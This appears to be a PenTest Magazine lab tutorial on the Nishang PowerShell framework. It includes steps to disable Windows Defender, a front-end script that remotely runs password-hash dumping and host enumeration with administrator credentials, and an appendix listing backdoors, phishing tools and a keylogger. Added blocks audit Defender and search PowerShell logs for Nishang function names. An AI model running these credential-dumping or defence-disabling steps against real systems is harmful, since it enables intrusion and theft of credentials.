This is my final article of 2016. I promise to write a lot more next year. It was originally published in PenTest Magazine. Check out the entire issue at https://pentestmag.com/download/pentest-pawning-powershell/.
So, sit back, relax and enjoy a bit of pentesting with PowerShell. ;-)
Introduction
Nishang is a framework created by the Indian security expert Nikhil Mittal. It is a really interesting tool, since it gathers a handful of scripts and modules that can be easily combined with any PowerShell code. You can use it to execute various tasks, such as network scanning and enumeration, credential discovery, WLAN password retrieval, remote execution and many others. The Git repository can be found at https://github.com/samratashok/nishang.
For the sake of this article, I'll focus on showing some of the possible uses of this framework. I have two VMs in my lab environment. One of them is running Windows 10 with no updates. Let's call it the attacker machine (or attacker, for short). The second VM is running Windows Server 2012 R2 with the latest updates. Let's call it the target machine (or target, for short).
It's important to understand that some antivirus programs can interpret Nishang's code as some kind of malware. So, the general advice in this case is: disable or, even better, uninstall any antivirus you may have on your attacker system. Mine has none.
Installation
That depends on you, but I think the most common way to do it would be to clone the repository. So, after installing Git for Windows (https://git-scm.com/download/win) on your attacker system, clone Nishang:
Powerpreter wants to be like Meterpreter after growing up. :-)
The scripts are organized into folders, so it is easy for you to use them according to your needs (check the next picture). Reading README.md is recommended to understand the basic usage of the code and the names and purposes of the scripts.
One of the first steps is to import nishang.psm1 as a module into your system. Besides this file, there is one more using the module format (Powerpreter.psm1). Powerpreter is the union of all Nishang's scripts in a single shell-like code. According to Nikhil himself, it “wants to be Meterpreter after growing up”. :-) Anyway, any of Nishang's scripts can be used as modules or as individual scripts. You only have to change the file extension.
My attacker's PowerShell version follows. As you may notice, I'm not using the Windows 10 Anniversary Update.
First contact
Every screenshot here was taken from the attacker. If you try to start your work with Powerpreter, you may get a message like this one:
This happens because Windows Defender is enabled by default. This window basically means your Powerpreter.psm1 will be deleted and you'll have to download it again. To avoid eventual errors such as this one, you must disable this feature. Simply run “gpedit.msc” and locate Computer Configuration > Administrative Templates > Windows Components > Windows Defender. Double-click “Turn off Windows Defender” and select “Enabled”. Click Apply and OK. You'll be done.
If you try to import nishang.psm1 as a module using “Import-Module nishang.psm1”, you may get an error message like this:
This means that the script execution policy is set to “Restricted” on your system. This is the default setting. You must enable script execution to start playing with any PowerShell code. Open an administrative PowerShell session and type:
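As an added example (my code, not part of the original article or of Nishang), the function below reports the Defender state that the policy change above affects, so you can confirm on a lab box that the setting took effect, or spot it on a machine where it should not be set. It assumes the Defender module cmdlets Get-MpComputerStatus and Get-MpPreference are available; the registry path is the one the “Turn off Windows Defender” policy writes its DisableAntiSpyware value to.

```powershell
# Added example: audit Windows Defender state on a lab machine (not from the original article).
# Assumes the Defender PowerShell module is present (Windows 8.1 / Server 2012 R2 and later).

# Policy key written by the GPO setting "Turn off Windows Defender".
$DefenderPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

function Get-DefenderLabState {
    $status = Get-MpComputerStatus
    $policy = Get-ItemProperty -Path $DefenderPolicyKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        AntivirusEnabled          = $status.AntivirusEnabled
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        # $null means the policy has not been applied; 1 means Defender is turned off by policy.
        DisableAntiSpywarePolicy  = $policy.DisableAntiSpyware
        # Folder exclusions are the narrower alternative to turning Defender off entirely.
        ExclusionPaths            = (Get-MpPreference).ExclusionPath
    }
}

Get-DefenderLabState | Format-List
```

If you would rather keep Defender running on the attacker VM, excluding only the Nishang folder (Add-MpPreference -ExclusionPath 'C:\Nishang') leaves real-time protection active for everything else; the ExclusionPaths field above is where such entries show up, which is also what an administrator reviewing a host would look at.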
PS C:\> Set-ExecutionPolicy Unrestricted
The Playground
This article doesn't intend to explain Nishang in deep detail. That is taken care of by the official documentation. There are some URLs on the Internet suggesting the use of wce.exe to get the hashes. I prefer writing my own code. It asks for the username (as well as the password) of the administrator (or some account with administrative privileges) of the target machine. Yeah, that's necessary, since you'll have to send some payloads to it. I avoided dealing with exception handling in order to have a smaller final code.
The code is split up into some functions to make reading and debugging easier. Some global variables are necessary since they must be changed inside functions.
Global Variables
$NishangFolder = "C:\Nishang\"
$FileCred = $NishangFolder + "Credentials.txt"   # Credentials file name
$CredProvided = $false                           # It's false until target credentials are provided
$Session = $null                                 # Target PowerShell session
$Target = $null                                  # Target IP address
There's a function used to display a simple menu and, after that, the main functions. One of them is responsible for getting the target's IP address and credentials. It gets and records the username and password in the $FileCred text file. To avoid always asking for username and password, the “GetIPCredentials” function reads this file and obtains both variables for the target machine. In case you're targeting another system, you'll have to delete the Credentials.txt file and the function will create it once again with new contents. Observe that the password is stored as a hash.
When you import Nishang's main module into your code, you may get another error message stating that the module nesting limit has been exceeded. This happens when your code resides in Nishang's main folder or inside one of its subfolders. That's because nishang.psm1 searches for all filenames ending with “.ps1” and reads them to import the corresponding functions. Simply create your code in a separate folder.
I'm going to run remote Nishang code using the Invoke-Command cmdlet. If you're dealing with computers inside and outside of an Active Directory domain, you may face some issues regarding authentication and the WinRM system. To circumvent them, you must add the target IP address as a trusted host. So, be aware of it before using Nishang. For instance, my attacker is not part of any domain, and my target is a Domain Controller. In an administrative command prompt (regular or PowerShell), type:
C:\>winrm set winrm/config/client @{TrustedHosts="<IP address>"}
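As an added example (mine, not from the original article), here is the same change done from PowerShell through the WSMan: drive, adding a single address instead of replacing the whole list, and removing it again afterwards. 192.0.2.10 is a placeholder for the target IP. The reason to handle this carefully is that an entry in TrustedHosts tells the WinRM client to send your credentials to that address without the mutual authentication Kerberos provides inside a domain, so the entry should name one address, never the wildcard, and should not outlive the lab session.

```powershell
# Added example: manage the WinRM client TrustedHosts list (not from the original article).
# Run in an elevated PowerShell session. 192.0.2.10 is a placeholder target address.

function Get-TrustedHostList {
    $value = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    if ([string]::IsNullOrWhiteSpace($value)) { return @() }
    return ($value -split ',' | ForEach-Object { $_.Trim() })
}

function Add-TrustedHostEntry {
    param([Parameter(Mandatory)][string]$Address)
    # '*' would make the client trust every host it ever connects to; refuse it.
    if ($Address -eq '*') { throw "Refusing to trust every host; give a single address." }
    if ((Get-TrustedHostList) -contains $Address) { return }
    # -Concatenate appends to the existing list instead of overwriting it.
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $Address -Concatenate -Force
}

function Remove-TrustedHostEntry {
    param([Parameter(Mandatory)][string]$Address)
    $remaining = Get-TrustedHostList | Where-Object { $_ -ne $Address }
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value ($remaining -join ',') -Force
}

# Lab usage:
Add-TrustedHostEntry -Address '192.0.2.10'
Get-TrustedHostList
Test-WSMan -ComputerName '192.0.2.10'   # confirms the listener answers before New-PSSession
# When the lab session is over, take the entry out again:
Remove-TrustedHostEntry -Address '192.0.2.10'
```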
The next screenshots demonstrate some of the code output. Sensitive information is hidden.
Excerpt of “Get-Information”:
Going further with “Get-Information”:
The end of “Get-Information”:
“Get-PassHashes” is quite interesting too:
The final commented code follows:
<#
.SYNOPSIS
A simple PowerShell code to test Nishang's scripts.
.DESCRIPTION
This script prompts for a target's credentials and invokes some scripts.
.AUTHOR
Mauricio Harley (https://linkedin.com/in/mauricioharley)
.DATE
Nov 11th, 2016
#>

<# Global Variables Section #>
$NishangFolder = "C:\Nishang\"
$FileCred = $NishangFolder + "Credentials.txt"   # Credentials file name
$CredProvided = $false                           # It's false until target credentials are provided
$Session = $null                                 # Target PowerShell session
$Target = $null                                  # Target IP address

Import-Module C:\nishang\nishang.psm1

<# This function is responsible for showing the script's menu. #>
Function ShowMenu {
    param ([string]$Header = 'Nishang Front-End')
    cls
    Write-Host "================ $Header ================"
    Write-Host "1: Inform Target IP and Credentials."
    Write-Host "2: Do Target port scanning."
    Write-Host "3: Gather Target information."
    Write-Host "4: Get Target Password Hashes."
    Write-Host "5: Scan Unconstrained Delegation Enabled (it may take a while)."
    Write-Host "Q: Press 'Q' to quit."
}

<# This function collects the target's IP address and credentials and opens a PS session. #>
Function GetIPCredentials {
    # If the file already exists and is not empty, we only need to read it
    If ((Test-Path $FileCred) -and ((Get-Item $FileCred).Length -gt 0)) {
        $Username = (Get-Content $FileCred)[0]
        $Password = (Get-Content $FileCred)[1]
    }
    Else {
        Write-Host "Enter the target's username (including domain if necessary): " -NoNewline
        $Username = Read-Host
        Write-Host "Enter the corresponding password: " -NoNewline
        # ConvertFrom-SecureString protects the string with DPAPI for the current user on this machine
        $Password = Read-Host -AsSecureString | ConvertFrom-SecureString
        Echo $Username > $FileCred
        Echo $Password >> $FileCred
    }
    # The stored password has to be converted back to a SecureString
    $Password = (Get-Content $FileCred)[1] | ConvertTo-SecureString
    # Storing credentials inside a single variable
    $Credentials = New-Object -TypeName System.Management.Automation.PSCredential `
        -ArgumentList $Username, $Password
    Write-Host
    Write-Host "Enter target's IP address: " -NoNewline
    $global:Target = Read-Host
    # Opening remote PowerShell session with the target
    $global:Session = New-PSSession -ComputerName $global:Target -Credential $Credentials
    $global:CredProvided = $true
    $Temp = $NishangFolder + "nishang.psm1"
    Invoke-Command -Session $global:Session -ScriptBlock { Import-Module $using:Temp }
}

<# This function is actually responsible for running something locally or at the target. #>
Function DoSomething {
    param ([string]$Param)   # Param: chosen option
    if (-not $global:CredProvided) {
        Write-Host "You must provide credentials first!"
        Return
    }
    else {
        if ($Param -eq '2') {
            # If the option is '2', the command runs locally (unique case).
            Invoke-PortScan -StartAddress $global:Target -EndAddress $global:Target
        }
        elseif ($Param -eq '3') {
            # Any other option will require remote command execution.
            Invoke-Command -Session $global:Session -ScriptBlock { Get-Information }
        }
        elseif ($Param -eq '4') {
            Invoke-Command -Session $global:Session -ScriptBlock { Get-PassHashes }
        }
        elseif ($Param -eq '5') {
            Invoke-Command -Session $global:Session -ScriptBlock { Get-Unconstrained }
        }
    }
}

Do {
    cls
    ShowMenu
    $Option = Read-Host "Please choose an option: "
    $Option = $Option.ToUpper()
    Switch ($Option) {
        '1' { GetIPCredentials }
        '2' { DoSomething $Option }
        '3' { DoSomething $Option }
        '4' { DoSomething $Option }
        '5' { DoSomething $Option }
        'Q' { Write-Host "Bye!" }
        default { Write-Host "Invalid option!" }
    }
    Pause
} Until ($Option -eq 'Q')

# Closing the remote session. The session was stored in the global scope by
# GetIPCredentials, so it must be read from there as well when the script is run as a file.
if ($global:Session -ne $null) {
    Remove-PSSession -Session $global:Session
}
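From the target's side, the Invoke-Command calls in the script above execute Get-Information, Get-PassHashes and Get-Unconstrained inside the remote session. As an added example (not part of the article's code or of Nishang), this function searches the target's PowerShell script block log for those function names. It assumes script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log) has been turned on by policy on the target; the indicator list is a constructed sample built from the function names used in this article.

```powershell
# Added example: find Nishang function names in the PowerShell script block log of a
# target (not from the original article). Assumes script block logging is enabled by policy.

# Constructed indicator list: function names this article invokes, plus a few from the Appendix.
$NishangIndicators = @('Get-PassHashes', 'Get-Information', 'Get-Unconstrained',
                       'Invoke-PortScan', 'Get-WLAN-Keys', 'Get-LSASecret')

function Find-NishangScriptBlocks {
    param(
        [string[]]$Patterns = $NishangIndicators,
        [int]$MaxEvents = 5000
    )
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # For event 4104, Properties[2] carries the ScriptBlockText fragment.
            $text = $_.Properties[2].Value
            if (-not $text) { return }
            foreach ($p in $Patterns) {
                if ($text -match [regex]::Escape($p)) {
                    [pscustomobject]@{
                        Time      = $_.TimeCreated
                        Indicator = $p
                        UserSid   = $_.UserId   # account the script block ran under
                        Snippet   = $text.Substring(0, [Math]::Min(120, $text.Length))
                    }
                    break   # one hit per event is enough
                }
            }
        }
}

Find-NishangScriptBlocks | Format-Table -AutoSize
```

Run it on the target after a lab session to see what the remote Invoke-Command calls left behind; with logging enabled, the imported module's own function bodies also appear as 4104 fragments, which is why the snippet is kept short.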
Conclusion
Nishang is really powerful and has many utilities that can be used for enumeration, uninstalling updates, downloading and running executables, bypassing UAC, getting Wireless LAN passwords and many other tasks (check more in the Appendix).
The external documentation is a bit simple and it would be nice if it got improved. Some scripts didn't run on my target system and some others presented errors. Dealing with error handling would be much appreciated. The whole platform should be updated to fit modern operating systems like the ones I used in this article. The code itself is well documented: every file starts with a small header describing what that script does and how it can be used. It was written using the PowerShell help format.
There are not so many tools in PowerShell to conduct pentesting. However, there's no doubt that Nishang is one of the most complete packages available. Combining its modular nature with its ability to run code locally or remotely, you can mix and match many available scripts. You can use the code I present here as a starting point for something bigger using all the possibilities that Nishang + PowerShell give us.
Appendix
Below you can find the other scripts and their purposes.
- Antak: Executes PowerShell scripts in memory, runs commands, downloads and uploads files using this webshell;
- HTTP-Backdoor: A backdoor which can receive instructions from third-party websites and execute PowerShell scripts in memory;
- DNS_TXT_Pwnage: A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target and be remotely controlled using the queries;
- Execute-OnTime: A backdoor which can execute PowerShell scripts at a given time on a target;
- Gupt-Backdoor: A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it;
- Add-ScrnSaveBackdoor: A backdoor which can use the Windows screen saver for remote command and script execution;
- Invoke-ADSBackdoor: A backdoor which can use alternate data streams and the Windows Registry to achieve persistence;
- Out-CHM: Create infected CHM files which can execute PowerShell commands and scripts;
- Out-Word: Create Word files and infect existing ones to run PowerShell commands and scripts;
- Out-Excel: Create Excel files and infect existing ones to run PowerShell commands and scripts;
- Out-HTA: Create an HTA file which can be deployed on a web server and used in phishing campaigns;
- Out-Java: Create signed JAR files which can be used with applets for script and command execution;
- Out-Shortcut: Create shortcut files capable of executing PowerShell commands and scripts;
- Out-WebQuery: Create IQY files for phishing credentials and SMB hashes;
- Out-JS: Create JS files capable of executing PowerShell commands and scripts;
- Out-SCT: Create SCT files capable of executing PowerShell commands and scripts;
- Out-SCF: Create an SCF file which can be used for capturing NTLM hash challenges;
- Enable-DuplicateToken: When SYSTEM privileges are required;
- Remove-Update: Introduce vulnerabilities by removing patches;
- Invoke-PsUACme: Bypass UAC;
- Download-Execute-PS: Download and execute a PowerShell script in memory;
- Download_Execute: Download an executable in text format, convert it to an executable, and execute it;
- Execute-Command-MSSQL: Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges;
- Execute-DNSTXT-Code: Execute shellcode in memory using DNS TXT queries;
- Out-RundllCommand: Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe;
- Check-VM: Check for a virtual machine;
- Copy-VSS: Copy the SAM file using the Volume Shadow Copy Service;
- Invoke-CredentialsPhish: Trick a user into giving credentials in plain text;
- FireBuster/FireListener: A pair of scripts for egress testing;
- Get-LSASecret: Get LSA Secrets from a target;
- Get-WLAN-Keys: Get WLAN keys in plain text from a target;
- Keylogger: Log keystrokes from a target;
- Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain text on Windows 8.1 and Server 2012.